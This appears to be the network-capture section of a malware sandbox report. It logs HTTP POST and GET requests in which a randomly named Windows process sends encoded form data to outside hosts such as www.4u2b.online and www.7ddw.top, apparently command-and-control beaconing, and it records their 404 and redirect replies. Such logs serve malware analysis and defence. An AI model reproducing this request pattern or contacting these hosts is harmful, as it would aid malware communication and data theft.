Aug 6, 2024 07:57:42.481730938 CEST	1825	OUT	POST /mm8l/ HTTP/1.1 Host: www.4u2b.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 1251 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.4u2b.online Referer: http://www.4u2b.online/mm8l/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 64 4c 76 76 48 46 56 71 72 45 71 2b 79 75 71 2f 73 69 78 38 65 53 6f 50 46 61 58 57 47 46 31 77 35 74 73 55 4a 6c 6f 52 2b 44 75 6b 61 78 4d 36 4e 72 76 44 75 67 57 68 2f 72 77 75 44 70 56 59 6e 34 75 56 6c 68 34 79 4b 68 4c 54 37 64 50 6a 67 6b 36 47 51 48 70 4a 65 42 4f 46 42 4f 6d 2f 7a 51 62 2f 62 73 6f 54 33 42 6d 41 67 34 74 2f 76 71 2f 4a 46 37 59 33 57 41 44 54 32 48 53 57 71 4d 6c 57 6f 39 39 77 31 55 61 6a 34 72 64 32 73 37 2f 63 42 57 74 50 56 62 4c 6f 39 58 6c 78 73 2b 76 48 33 42 34 75 76 4f 62 58 32 50 6e 76 49 58 45 56 34 72 57 44 51 5a 5a 70 33 70 72 4c 42 36 2b 4b 75 50 30 30 6a 6a 6c 37 61 35 74 52 78 74 73 33 47 4c 73 43 57 51 36 61 6a 6f 43 62 33 6a 46 67 50 4e 30 56 66 35 46 51 54 68 36 64 78 72 73 48 56 36 70 67 34 33 73 35 66 49 72 69 54 35 69 4a 6d 6d 6c 61 62 72 5a 38 69 57 2f 36 6b 64 64 38 64 5a 6e 35 32 75 65 78 70 64 6c 6a 36 71 6f 32 37 4c 75 4e 75 34 4c 47 6d 57 76 4c 61 72 45 49 55 56 76 4e 59 48 4b 6c 45 6a 75 65 44 57 76 51 66 66 33 66 67 35 2f [TRUNCATED] Data Ascii: wLTtn0=dLvvHFVqrEq+yuq/six8eSoPFaXWGF1w5tsUJloR+DukaxM6NrvDugWh/rwuDpVYn4uVlh4yKhLT7dPjgk6GQHpJeBOFBOm/zQb/bsoT3BmAg4t/vq/JF7Y3WADT2HSWqMlWo99w1Uaj4rd2s7/cBWtPVbLo9Xlxs+vH3B4uvObX2PnvIXEV4rWDQZZp3prLB6+KuP00jjl7a5tRxts3GLsCWQ6ajoCb3jFgPN0Vf5FQTh6dxrsHV6pg43s5fIriT5iJmmlabrZ8iW/6kdd8dZn52uexpdlj6qo27LuNu4LGmWvLarEIUVvNYHKlEjueDWvQff3fg5/aRukWVfuTlJxx6qqSx54b4rLalMB9Le98gvGwtc8v4HWfeRKLP41NC3zhvUyk98a0RJP6xR5MwsrVM1oRQzA7WQPHR33EpIhuQ2pHet3UnmTcAItT24NRkRkRjcR9+2PYgs5229pqMxSpPQblX9LUkbOGDENZ5f1NAv1mz7O4m7RAo/5IZ48ym5L5lDZZtnnZOlHfRxh/q7xqftJvmuoNXpbJolpiEhJqf3gXr4g6ST9zT5OoxvMSa1iBBNh9QIzsJhV797uRX3sefQvpzndS8+Sv1AFPI7XKyHwqIGHCRy7XzR0VsiKkp5TXhgdzc7/23BTQGlkKvTEjXc4Qp8n0Q8R6R1EL0s8jl2MDyt8cUlQg1cBXnHhInEZBwzgP8/OWHMzr3hUt1Ce5lGFO8k2j4JFHqE6QFErRHFA3TwXR5oOTZDvEdEeabyNgFIxll/j8TPeF1bET4BrJ6jxtSD1Ntr5MpWMKsK+2toSuQ+beF0KOKml/f6yrdNH4puRp91Jg1F5o1vze0VcfTAcnh+PduOK5Qu1pBb6zQ+Qmpj1FCA50qupGcp2Sh+fSTwTwamFTv0jxOLehCjyQivKPdK+iwuRDoWlgeKVyFfeQlvyBemJrU1/JMmIqEnmL7o+aY/3I4wFvHdZgoFKQKB2Q4p9rreFa5r+ABahaX [TRUNCATED]
Aug 6, 2024 07:57:44.368031025 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://4u2b.online/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Tue, 06 Aug 2024 05:57:43 GMT Data Raw: 32 32 32 38 0d 0a 90 be 28 8a 72 d2 fa 43 46 22 8c f9 00 68 a4 2c 9c bf 7f 84 0e 9f f3 fe f3 97 56 df 71 55 7f fc cb 4a 05 4b 69 21 f0 dd 8b 9b f4 71 ce 99 e9 6b af 38 95 11 e8 81 95 08 89 95 84 8d 97 e6 7f 9d 46 d5 f8 bd 29 fa bf cc 06 fb 56 02 49 04 63 ec 61 73 9a bd 90 fc 04 fa 60 bd 01 49 2b 89 b1 7d 21 35 dd 55 57 14 ed fd ff be cd ec 17 87 58 b4 5b 94 6e dd 2a 3a a7 ca a7 77 67 6f 75 ef bb af f8 33 ff 17 33 1a 8a 41 50 80 40 79 03 08 0a 04 ba 2f fe 3f 71 87 01 d9 a3 4c b2 0d 6c 02 2d 8a 09 39 e0 10 42 ed d2 b5 a4 75 88 a1 75 53 8c 63 ea 5c 94 5b 7a 39 cc be 67 f7 af 22 22 82 d0 55 e8 63 38 df a9 80 31 4c 98 ff 63 cc ba df 43 42 54 72 30 d2 cb 46 09 50 d6 57 d0 11 1a 3d 7d d5 e3 e7 18 4c fc e3 1b be e1 64 63 03 61 99 fc b7 7a 08 39 1e fb 5d ba f5 33 a2 81 1c 0b 4b 02 93 43 a3 a8 17 e4 41 d7 30 34 d0 fb a0 d8 97 42 43 3e c7 f4 e5 d3 ca 3c 21 07 3a c7 ad b3 95 d2 d0 59 bb 4c dd b4 35 b7 ae 4e fa ca 24 73 7f 5f 48 50 41 c3 cd 5f a2 06 64 6c 40 53 63 fd 46 44 97 2f 16 f3 f9 0e ad 7e 2c de f2 db 3f [TRUNCATED] Data Ascii: 2228(rCF"h,VqUJKi!qk8F)VIcas`I+}!5UWX[n:wgou33AP@y/?qLl-9BuuSc\[z9g""Uc81LcCBTr0FPW=}Ldcaz9]3KCA04BC><!:YL5N$s_HPA_dl@ScFD/~,?zw9[g/K5c7)[JnH1aFYExD</m\8AY$!sB$/GWI {gL$l)7;u2YpjLQ\?K}[WOJ` \|O~'a7f;W\ZS@hm'6./:o\>$SV)Hy$`cSAd2=V!<`TCpgfw>XeE{+V;+kDC%@C,L3ex0$\oKf;@R20Gy"7%w2;"SP&,ogK#jx/@yKe.'tFj?ADB-y-<ww~L~X:qa0edU
Aug 6, 2024 07:57:44.368063927 CEST	1236	IN	Data Raw: 2d f7 5d 05 69 b5 ef 16 69 2a f7 dd 62 23 b6 5b cb c3 a0 2b 17 87 41 5f 4d e7 d9 14 75 a3 ac c4 f5 ba 4b ec 8c 88 38 d0 de 68 14 7d 7e a1 55 b5 da 77 b2 58 a5 fb 4e 96 9b ed f5 15 17 2b ae cb 00 3f c5 b6 b1 89 56 24 70 0f ba ad ab 5e ac 7a bd 7b Data Ascii: -]ii*b#[+A_MuK8h}~UwXN+?V$p^z{e[aKQ03lw\l)0U1/CutC.15${IBom!<)0%q_8:#t2M\|L()bD4?]M>'Wu`>gtD}x+<he
Aug 6, 2024 07:57:44.368099928 CEST	1236	IN	Data Raw: 2b a1 0e 68 c3 91 ba ed ad b7 36 26 35 23 15 7a 35 4a 41 d2 7b 67 9a d7 70 24 81 3a 9a f4 ac 93 20 c3 dc 3a cf bf ac 36 ca 58 48 67 5f 90 6b 4b 51 a3 af c6 68 9d 03 f2 58 4e a0 61 8e 8f ec 6c fd 9c 2f 04 8e 69 f0 6c 5f 05 76 3f 61 d0 11 89 a3 34 Data Ascii: +h6&5#z5JA{gp$: :6XHg_kKQhXNal/il_v?a4h\|\|tIDq%o9) ]C?Wqm&*\.B(!%XbV"T#m5ct_\0<Z=yhq),7KmB"N(k+WN
Aug 6, 2024 07:57:44.368114948 CEST	1236	IN	Data Raw: 2e 5a 99 a2 87 3d 9e 01 a4 20 5c 1c 26 b5 d3 53 32 c2 79 4d 44 15 82 32 cf 36 82 d2 1f 05 9a 69 a1 14 61 67 f0 33 78 41 a5 d7 a5 05 c1 b6 d0 17 6c da 2d 14 35 b8 f0 66 f4 29 97 82 14 3d 7f 66 51 2a 58 0b 2c 2b 4b 8f 8b b1 96 e2 69 ad f7 77 b7 64 Data Ascii: .Z= \&S2yMD26iag3xAl-5f)=fQX,+Kiwd-MXj5kAdbh^Pe:[[n`gN(Dvb5g]spf"aX?x(c%.}{y+=jf(kh)9vV0+n
Aug 6, 2024 07:57:44.368129015 CEST	1236	IN	Data Raw: ce 58 03 19 07 dd 25 71 03 f6 a0 14 75 46 5a 72 d7 31 be b9 88 bc 95 7b 15 60 20 d6 33 19 57 3e 0e fd 02 64 20 c5 5f ce 8e 2b d5 43 ee f5 30 2f e7 b0 5d 16 72 02 f9 b4 ed c5 1b 77 18 2f 5b 51 03 b4 21 85 13 46 2a 53 03 07 05 3a 65 33 43 43 a0 0f Data Ascii: X%quFZr1{` 3W>d _+C0/]rw/[Q!FS:e3CCmL6a`g;\HtmzkMWsYm/-mh#8"#5e="3E41^E~"G}/\%+.x:MGG
Aug 6, 2024 07:57:44.368143082 CEST	1236	IN	Data Raw: 95 18 74 bc b6 a8 7b 07 b4 21 f3 6e ee 77 68 75 b3 95 2a e4 82 f1 3a 67 22 9f ed 64 c7 42 36 11 a7 2e 59 86 0f 08 ad d0 84 50 d7 a9 70 b0 4a 9b e9 29 5d 73 13 10 02 a3 89 c7 f1 73 74 03 af c4 95 00 86 1d 29 af d8 ad a8 11 e5 d8 75 55 2a f9 f0 94 Data Ascii: t{!nwhu:g"dB6.YPpJ)]sst)uU9p^dKa:r=B"Dt8 F}d=_4i1A>?KY#6s2qa&2lY@G6<8rJxwXfq(Y2Q.}5C0?OO{X0a
Aug 6, 2024 07:57:44.368155003 CEST	776	IN	Data Raw: 54 5f 18 85 37 f8 93 59 90 21 f0 c6 d3 13 bc f3 0e ec 50 96 94 49 1d a6 d7 c5 e3 08 4f 8a 0d c3 0b 5b cc 38 33 c7 cd be dc 86 bf 6f 12 6a 32 66 20 b5 1e 3c d1 7e 1a 8e 9b bf ef b6 bb e3 c6 4e 80 26 7b 59 e6 aa d3 19 e5 74 1e 66 bb aa d7 f5 cf 72 Data Ascii: T_7Y!PIO[83oj2f <~N&{Ytfrcjrj8C@P`rdJratOidPx[axLQaEw}pVx!:*G@c5B>c9WW/DicD-h=$X}
Aug 6, 2024 07:57:44.368168116 CEST	923	IN	Data Raw: 53 ac 3c c8 ea 20 cb fe 30 b0 aa 62 83 f0 c4 5e 5a ab a7 a6 e0 cd 1e 19 63 b5 f9 93 d2 9f 84 ae a7 a6 e3 a8 39 4f 02 bd e0 6e 57 0f 5a aa d6 19 ae 81 2e a5 6f 3e a4 9f 7c f3 c1 17 5f 77 0b 3b d7 3e 9c 3b a9 a4 08 11 30 d4 e3 34 c5 ad 55 83 e4 d6 Data Ascii: S< 0b^Zc9OnWZ.o>\|_w;>;04UNSzzEQTHc9xNWxmW~vJFTfl9.h)*W#;51G10k&GCb\|5"R\|aBcR;+<)Ze5rTQ
Aug 6, 2024 07:57:44.368930101 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://4u2b.online/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Tue, 06 Aug 2024 05:57:43 GMT Data Raw: 32 32 32 38 0d 0a 90 be 28 8a 72 d2 fa 43 46 22 8c f9 00 68 a4 2c 9c bf 7f 84 0e 9f f3 fe f3 97 56 df 71 55 7f fc cb 4a 05 4b 69 21 f0 dd 8b 9b f4 71 ce 99 e9 6b af 38 95 11 e8 81 95 08 89 95 84 8d 97 e6 7f 9d 46 d5 f8 bd 29 fa bf cc 06 fb 56 02 49 04 63 ec 61 73 9a bd 90 fc 04 fa 60 bd 01 49 2b 89 b1 7d 21 35 dd 55 57 14 ed fd ff be cd ec 17 87 58 b4 5b 94 6e dd 2a 3a a7 ca a7 77 67 6f 75 ef bb af f8 33 ff 17 33 1a 8a 41 50 80 40 79 03 08 0a 04 ba 2f fe 3f 71 87 01 d9 a3 4c b2 0d 6c 02 2d 8a 09 39 e0 10 42 ed d2 b5 a4 75 88 a1 75 53 8c 63 ea 5c 94 5b 7a 39 cc be 67 f7 af 22 22 82 d0 55 e8 63 38 df a9 80 31 4c 98 ff 63 cc ba df 43 42 54 72 30 d2 cb 46 09 50 d6 57 d0 11 1a 3d 7d d5 e3 e7 18 4c fc e3 1b be e1 64 63 03 61 99 fc b7 7a 08 39 1e fb 5d ba f5 33 a2 81 1c 0b 4b 02 93 43 a3 a8 17 e4 41 d7 30 34 d0 fb a0 d8 97 42 43 3e c7 f4 e5 d3 ca 3c 21 07 3a c7 ad b3 95 d2 d0 59 bb 4c dd b4 35 b7 ae 4e fa ca 24 73 7f 5f 48 50 41 c3 cd 5f a2 06 64 6c 40 53 63 fd 46 44 97 2f 16 f3 f9 0e ad 7e 2c de f2 db 3f [TRUNCATED] Data Ascii: 2228(rCF"h,VqUJKi!qk8F)VIcas`I+}!5UWX[n:wgou33AP@y/?qLl-9BuuSc\[z9g""Uc81LcCBTr0FPW=}Ldcaz9]3KCA04BC><!:YL5N$s_HPA_dl@ScFD/~,?zw9[g/K5c7)[JnH1aFYExD</m\8AY$!sB$/GWI {gL$l)7;u2YpjLQ\?K}[WOJ` \|O~'a7f;W\ZS@hm'6./:o\>$SV)Hy$`cSAd2=V!<`TCpgfw>XeE{+V;+kDC%@C,L3ex0$\oKf;@R20Gy"7%w2;"SP&,ogK#jx/@yKe.'tFj?ADB-y-<ww~L~X:qa0edU
Aug 6, 2024 07:57:44.369684935 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://4u2b.online/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Tue, 06 Aug 2024 05:57:43 GMT Data Raw: 32 32 32 38 0d 0a 90 be 28 8a 72 d2 fa 43 46 22 8c f9 00 68 a4 2c 9c bf 7f 84 0e 9f f3 fe f3 97 56 df 71 55 7f fc cb 4a 05 4b 69 21 f0 dd 8b 9b f4 71 ce 99 e9 6b af 38 95 11 e8 81 95 08 89 95 84 8d 97 e6 7f 9d 46 d5 f8 bd 29 fa bf cc 06 fb 56 02 49 04 63 ec 61 73 9a bd 90 fc 04 fa 60 bd 01 49 2b 89 b1 7d 21 35 dd 55 57 14 ed fd ff be cd ec 17 87 58 b4 5b 94 6e dd 2a 3a a7 ca a7 77 67 6f 75 ef bb af f8 33 ff 17 33 1a 8a 41 50 80 40 79 03 08 0a 04 ba 2f fe 3f 71 87 01 d9 a3 4c b2 0d 6c 02 2d 8a 09 39 e0 10 42 ed d2 b5 a4 75 88 a1 75 53 8c 63 ea 5c 94 5b 7a 39 cc be 67 f7 af 22 22 82 d0 55 e8 63 38 df a9 80 31 4c 98 ff 63 cc ba df 43 42 54 72 30 d2 cb 46 09 50 d6 57 d0 11 1a 3d 7d d5 e3 e7 18 4c fc e3 1b be e1 64 63 03 61 99 fc b7 7a 08 39 1e fb 5d ba f5 33 a2 81 1c 0b 4b 02 93 43 a3 a8 17 e4 41 d7 30 34 d0 fb a0 d8 97 42 43 3e c7 f4 e5 d3 ca 3c 21 07 3a c7 ad b3 95 d2 d0 59 bb 4c dd b4 35 b7 ae 4e fa ca 24 73 7f 5f 48 50 41 c3 cd 5f a2 06 64 6c 40 53 63 fd 46 44 97 2f 16 f3 f9 0e ad 7e 2c de f2 db 3f [TRUNCATED] Data Ascii: 2228(rCF"h,VqUJKi!qk8F)VIcas`I+}!5UWX[n:wgou33AP@y/?qLl-9BuuSc\[z9g""Uc81LcCBTr0FPW=}Ldcaz9]3KCA04BC><!:YL5N$s_HPA_dl@ScFD/~,?zw9[g/K5c7)[JnH1aFYExD</m\8AY$!sB$/GWI {gL$l)7;u2YpjLQ\?K}[WOJ` \|O~'a7f;W\ZS@hm'6./:o\>$SV)Hy$`cSAd2=V!<`TCpgfw>XeE{+V;+kDC%@C,L3ex0$\oKf;@R20Gy"7%w2;"SP&,ogK#jx/@yKe.'tFj?ADB-y-<ww~L~X:qa0edU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49722	141.94.102.188	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:57:45.031917095 CEST	535	OUT	GET /mm8l/?wLTtn0=QJHPEyd/9nGk0pWFnTVCTHVJEZeUTkkF6sY+O24D8hqBfRocJb7yxCDA6KFINoFi4IC1nHRAbEj+/fbu8m+QV1lpDHaccqqOhwbUbbUBhji0hskW+bSOHo9JJy3p6Ubdn+lA5+hwokaA&K4G=Thy4J4VXH8ud HTTP/1.1 Host: www.4u2b.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Aug 6, 2024 07:57:45.939328909 CEST	469	IN	HTTP/1.1 301 Moved Permanently Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: http://4u2b.online/mm8l/?wLTtn0=QJHPEyd/9nGk0pWFnTVCTHVJEZeUTkkF6sY+O24D8hqBfRocJb7yxCDA6KFINoFi4IC1nHRAbEj+/fbu8m+QV1lpDHaccqqOhwbUbbUBhji0hskW+bSOHo9JJy3p6Ubdn+lA5+hwokaA&K4G=Thy4J4VXH8ud content-length: 0 date: Tue, 06 Aug 2024 05:57:45 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49723	154.23.184.207	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:57:51.075206041 CEST	783	OUT	POST /rjww/ HTTP/1.1 Host: www.7ddw.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 219 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.7ddw.top Referer: http://www.7ddw.top/rjww/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 37 33 62 42 53 79 6d 2b 33 69 69 62 72 6e 56 68 44 42 53 48 50 34 30 52 6a 71 2f 47 38 59 31 51 2b 57 4f 2f 78 2f 54 38 57 56 78 4a 53 35 52 4e 37 58 57 30 51 6a 46 54 30 73 46 78 50 35 6a 31 64 4b 75 46 46 74 4a 63 73 6b 32 62 4a 6c 38 58 38 69 6b 59 6d 46 65 56 74 7a 67 4b 51 30 30 37 51 6f 4a 49 76 4f 69 70 74 49 4c 64 43 56 2f 30 64 62 38 53 4a 37 2b 66 54 6c 4c 5a 36 36 35 34 53 77 6d 77 43 4e 50 6a 7a 2f 57 73 6b 57 50 39 68 65 65 43 50 41 4d 48 70 5a 65 66 53 46 42 63 4b 62 47 68 6a 6b 74 49 49 54 4c 75 33 4a 78 79 33 57 79 57 44 59 68 39 4e 6a 79 4f 33 6b 2f 62 78 50 41 65 37 74 64 4e 63 36 66 4f 55 51 31 64 6b 67 3d 3d Data Ascii: wLTtn0=73bBSym+3iibrnVhDBSHP40Rjq/G8Y1Q+WO/x/T8WVxJS5RN7XW0QjFT0sFxP5j1dKuFFtJcsk2bJl8X8ikYmFeVtzgKQ007QoJIvOiptILdCV/0db8SJ7+fTlLZ6654SwmwCNPjz/WskWP9heeCPAMHpZefSFBcKbGhjktIITLu3Jxy3WyWDYh9NjyO3k/bxPAe7tdNc6fOUQ1dkg==
Aug 6, 2024 07:57:51.947933912 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 06 Aug 2024 05:56:47 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a62378-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49724	154.23.184.207	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:57:53.625437021 CEST	803	OUT	POST /rjww/ HTTP/1.1 Host: www.7ddw.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 239 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.7ddw.top Referer: http://www.7ddw.top/rjww/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 37 33 62 42 53 79 6d 2b 33 69 69 62 70 48 46 68 51 6d 2b 48 4b 59 30 53 70 4b 2f 47 32 34 31 4d 2b 57 43 2f 78 37 69 35 57 48 56 4a 53 63 74 4e 38 6d 57 30 64 44 46 54 67 63 46 34 42 5a 6a 36 64 4b 69 4e 46 74 31 63 73 6c 53 62 4a 6b 4d 58 38 78 38 58 30 6c 65 58 68 54 67 49 54 45 30 37 51 6f 4a 49 76 4f 65 50 74 49 7a 64 43 42 44 30 64 36 38 52 44 62 2b 63 62 46 4c 5a 2b 36 35 30 53 77 6d 53 43 50 36 32 7a 36 61 73 6b 57 66 39 67 4b 4b 4e 57 77 4e 4f 33 70 66 62 57 46 31 5a 48 2f 43 4e 70 31 56 77 4e 43 6a 4b 37 66 73 51 74 30 2b 36 64 4a 5a 47 4a 68 57 34 67 43 69 75 7a 4f 45 47 32 50 70 73 44 4e 36 6b 5a 43 55 5a 79 5a 2b 2f 6f 4d 6d 39 6c 31 78 59 4d 48 2b 73 72 66 4b 6e 6c 72 41 3d Data Ascii: wLTtn0=73bBSym+3iibpHFhQm+HKY0SpK/G241M+WC/x7i5WHVJSctN8mW0dDFTgcF4BZj6dKiNFt1cslSbJkMX8x8X0leXhTgITE07QoJIvOePtIzdCBD0d68RDb+cbFLZ+650SwmSCP62z6askWf9gKKNWwNO3pfbWF1ZH/CNp1VwNCjK7fsQt0+6dJZGJhW4gCiuzOEG2PpsDN6kZCUZyZ+/oMm9l1xYMH+srfKnlrA=
Aug 6, 2024 07:57:54.504656076 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 06 Aug 2024 05:56:50 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a62378-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49725	154.23.184.207	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:57:56.171472073 CEST	1816	OUT	POST /rjww/ HTTP/1.1 Host: www.7ddw.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 1251 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.7ddw.top Referer: http://www.7ddw.top/rjww/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 37 33 62 42 53 79 6d 2b 33 69 69 62 70 48 46 68 51 6d 2b 48 4b 59 30 53 70 4b 2f 47 32 34 31 4d 2b 57 43 2f 78 37 69 35 57 48 64 4a 56 70 68 4e 2f 46 75 30 63 44 46 54 6a 63 46 39 42 5a 6a 6e 64 4a 53 33 46 74 35 71 73 6e 61 62 62 57 45 58 72 55 51 58 74 56 65 58 70 7a 67 4a 51 30 30 55 51 6f 35 55 76 4b 2b 50 74 49 7a 64 43 48 6e 30 66 72 38 52 51 4c 2b 66 54 6c 4c 46 36 36 34 68 53 77 2f 6c 43 50 2f 4e 30 4f 6d 73 6b 32 76 39 6e 2f 65 4e 4a 41 4e 4d 32 70 66 39 57 46 6f 4a 48 2b 71 42 70 31 68 65 4e 44 58 4b 2f 71 70 2f 33 31 48 6a 4f 5a 46 7a 44 51 65 47 70 6a 6d 61 72 4e 41 44 7a 59 5a 4b 46 76 4f 4a 41 41 39 4e 6d 4d 6e 5a 30 73 4f 72 70 55 35 61 4d 33 48 77 75 50 76 74 77 4d 57 2f 50 43 6e 56 72 54 42 44 65 36 53 46 72 48 30 37 73 50 57 6c 7a 64 62 61 31 59 6a 4c 52 41 54 61 37 75 69 33 53 43 47 79 35 79 64 74 78 42 44 76 54 78 72 30 46 75 41 4f 4c 46 74 6b 6b 4b 7a 2f 54 37 75 4c 50 42 76 38 36 56 79 31 42 71 73 6a 70 55 32 4e 4f 4f 38 65 66 54 43 69 7a 37 54 78 6b 46 4d [TRUNCATED] Data Ascii: wLTtn0=73bBSym+3iibpHFhQm+HKY0SpK/G241M+WC/x7i5WHdJVphN/Fu0cDFTjcF9BZjndJS3Ft5qsnabbWEXrUQXtVeXpzgJQ00UQo5UvK+PtIzdCHn0fr8RQL+fTlLF664hSw/lCP/N0Omsk2v9n/eNJANM2pf9WFoJH+qBp1heNDXK/qp/31HjOZFzDQeGpjmarNADzYZKFvOJAA9NmMnZ0sOrpU5aM3HwuPvtwMW/PCnVrTBDe6SFrH07sPWlzdba1YjLRATa7ui3SCGy5ydtxBDvTxr0FuAOLFtkkKz/T7uLPBv86Vy1BqsjpU2NOO8efTCiz7TxkFMzCdZwMuVe6GlnCalcRJnFrxRcymwBLzi94hUvK33nKA7J1arGEP9mJCDfqKp9ROoznh0bGbE/5u4AO7nKItQO0DiAF6JwwCMAu93OblQqFuoyHUFTK+PyLEM63Q+z2ByVk7Go5UAdhcB+G1nava3kW5r/cRY3glq/JwCyKmX3yYJcNia4b/uG3dc3QvPZd2Zr5MyB+5tZk6h0ZXNrxHddmmriaEx+McANen42EEf16NuShdnTlMF8/LgCSHBYTly66FVMZM9AwISIyJEIIpMhrOjj47lLMlgQLsHhvfJx4wIT701RK5W67wtV/x0IbquwwVPFMiLWn24cOUiZK+1xWveG5Xuapr0+OVgcIZBBp76Xal4KaYH1/a9NLjwJYyHNENdbf+2LuCcpb0wMu0vvYR8R+0erSk2GVA81+AUj6tM4TGx9gdErK0a9Cybg4yMpSvhJjgJplZyCWPGMe7+B/v7TPOjycxHKYNtviMBFx3BA6hwTeNPmEWWC4wcO2vd/sTLgDovrZo8RFTUNdSEf1BnMq5HrfGdT